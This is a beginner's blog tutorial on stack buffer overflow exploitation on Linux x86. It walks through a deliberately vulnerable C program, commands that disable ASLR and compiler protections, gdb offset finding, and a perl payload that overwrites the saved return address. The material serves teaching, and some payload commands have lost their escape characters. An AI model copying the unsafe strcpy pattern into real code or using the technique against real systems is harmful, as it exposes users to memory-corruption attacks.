Introduction to the art of exploiting on Linux-x86

Creating an exploit is a complex process that requires a lot of technical knowledge, patience, and a touch of intuition. I’m not an expert in this field, in fact, I just embarked on my first journey into this wonderful world. I will explain the techniques I learn in a practical and clear way. All tests will be performed on x86 architecture, as it will be easier to understand, although the concepts are fully transferable to x86_64. We will start with a simple program vulnerable to what is called stack overrun, stack smashing, or buffer overrun.

The material presented here is purely educational and is not intended to incite the use of this knowledge for destructive purposes. That being said, I am not responsible for any misuse of this information, as the crime does not lie in the knowledge itself, but in its use.

To perform all our tests, we will install a virtual machine where we can experiment without any problems, as certain protections in the kernel will have to be disabled and the binaries will have to be compiled by disabling certain security-related features in the compiler. This way, we will have an OS to conceptually test all methods. I personally chose Debianx86, but any other distro would work just as well.

The changes to be made at the OS level are:

echo 0 > /proc/sys/kernel/randomize_va_space
The parameters to be disabled in the compiler are:

gcc -fno-stack-protector -D_FORTIFY_SOURCE=0 -z norelro -z execstack

First of all, we must explain certain concepts necessary to understand the techniques presented later. Any software runs sequentially, that is, one instruction after another. The next instruction to be executed is stored in a register called IP. Through programming, execution can be diverted to functions that perform specific tasks. The program will execute the normal flow at first until it reaches a call to a function. At that moment, it saves the IP register in RAM, executes the function, and returns to the main flow of the program because it was able to read the stored value in RAM of the IP register.

An example will make it easier to understand. Let’s imagine that we have the following program:

#include <string.h>
#include <stdlib.h>
#include <stdio.h>

void func (char *arg){
    char nombre[32];
    strcpy(nombre, arg);
    printf("Alfaexploit overrun proof of concept, welcome: %s", nombre);
}

int main(int argc, char *argv[]){
    if (argc != 2 ){
        printf("Uso: %s NOMBRE", argv[0]);
        exit(0);
    }

    func(argv[1]);
    printf("Fin del programa");
    return 0;
}

We compile the program:

gcc -fno-stack-protector -D_FORTIFY_SOURCE=0 -z norelro -z execstack overrun.c -o overrun

This software simply waits for an argument that is the user’s name and calls the func function with that argument. When this software is executed and the func function is called, the state of the memory will be:

The portion of RAM used by a program when a function is called is commonly called a stack. We must bear in mind that the stack grows from bottom to top. As we can see, there is a part of the RAM that stores a copy of the IP register (EIP) at the time of the function call. In the program, it is not taken into account that the entered data has a specific length. The copy is blindly made to the name variable. Taking advantage of this carelessness, we can grow the name variable until it reaches the EIP return address, thus causing the software to return to another memory position and not the one that was saved when calling the func function.

If we run the program with a normal input:

root@reversedbox:~# ./overrun kr0m

 Alfaexploit overrun proof of concept, welcome: kr0m
End of program

As a test, we will make the EIP memory position coincide with the func function, thus causing the printf to execute several times since, upon finishing executing func, it will return to said function again. To obtain the memory address, we can use the objdump tool as follows:

objdump -d overrun |grep func

080484ac <func>:
 8048514: e8 93 ff ff ff call 80484ac <func>

NOTE: In the x86 architecture, little-endian is used, so the memory address would be as follows: ac 84 04 08

We run the software with the modified input variable so that it manages to overwrite the EIP with the memory address where the func function is located:

root@reversedbox:~# ./overrun perl -e 'print "A"x44 . "xacx84x04x08"'

 Alfaexploit overrun proof of concept, welcome: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA¬
 Alfaexploit overrun proof of concept, welcome: Uåì8D$E?$è¬þÿÿE?D$Ç$èþÿÿÉÃUåäðìt!E
Violación de segmento

Ouuuu yeahhh baby, we have managed to divert the normal flow of the software execution due to a programming error. What we have done is to introduce a variable composed of 44 times the character A, which is simply filler to reach the EIP position and write the value of the memory address of the func function at that position, thus overwriting the original value of EIP.

NOTE: The fact that the character A has to be entered 44 times is not due to an epiphany. This value is calculated by loading the software through gdb (the GNU debugger). The simplest technique is to keep entering variables of a certain length with values such as letters. When the software jumps to the address marked by the overwritten EIP, it indicates the specific address. By converting this address to ASCII in hexadecimal, we can know which letter overwrote the EIP and therefore how many bytes away the EIP is from the ESP.

We install gdb:

apt-get install gdb

We load the program:

gdb overrun

We run the program normally:

(gdb) run kr0m

Starting program: /root/overrun kr0m
 Alfaexploit overrun proof of concept, welcome: kr0m
Fin del programa

[Inferior 1 (process 3525) exited normally]

But if we run it now with an input that is the alphabet repeated four times, we get:

(gdb) run AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOOPPPPQQQQRRRRSSSSTTTTUUUUVVVVWWWWXXXXYYYYZZZZ

Starting program: /root/overrun AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOOPPPPQQQQRRRRSSSSTTTTUUUUVVVVWWWWXXXXYYYYZZZZ

 Alfaexploit overrun proof of concept, welcome: AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOOPPPPQQQQRRRRSSSSTTTTUUUUVVVVWWWWXXXXYYYYZZZZ

Program received signal SIGSEGV, Segmentation fault.
0x4c4c4c4c in ?? ()

We can see that it has tried to return to the address 0x4c4c4c4c, in other words, the value of EIP at the time of returning to the main flow of the program had the value 0x4c4c4c4c, therefore knowing that 0x4c4c4c4c in ascii is LLLLLLLL, we already know what padding is needed. If we count the number of characters from AAAA to KKKK, it gives us 44, just the number of times we had called the program with the help of perl:

root@reversedbox:~# ./overrun ` perl -e ‘print “A"x44 . “xacx84x04x08”’`

This is just a conceptual introduction and a basic example of its operation. As I acquire more skill in the new arts, I will publish more complex and entertaining articles ;)

Introduction to the art of exploiting on Linux-x86

See Also